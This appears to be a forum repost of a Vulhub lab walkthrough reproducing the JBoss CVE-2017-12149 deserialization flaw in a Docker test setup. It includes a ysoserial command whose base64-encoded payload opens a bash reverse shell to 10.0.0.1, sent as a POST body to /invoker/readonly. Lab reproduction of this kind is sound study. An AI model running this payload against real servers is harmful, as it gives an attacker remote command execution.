原文链接:https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 参考: 测试环境运行测试环境 docker-compose up -d首次执行时会有1~3分钟时间初始化,初始化完成后访问http://your-ip:8080/即可看到JBoss默认页面。 漏洞复现该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化: 所以,我们用常规Java反序列化漏洞测试方法来复现该漏洞。 编写反弹shell的命令我们使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。 序列化数据生成使用ysoserial来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5: - java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可: 成功反弹shell:
| 
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2017-11-27 11:18:39
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
发表于 2017-12-22 09:45:11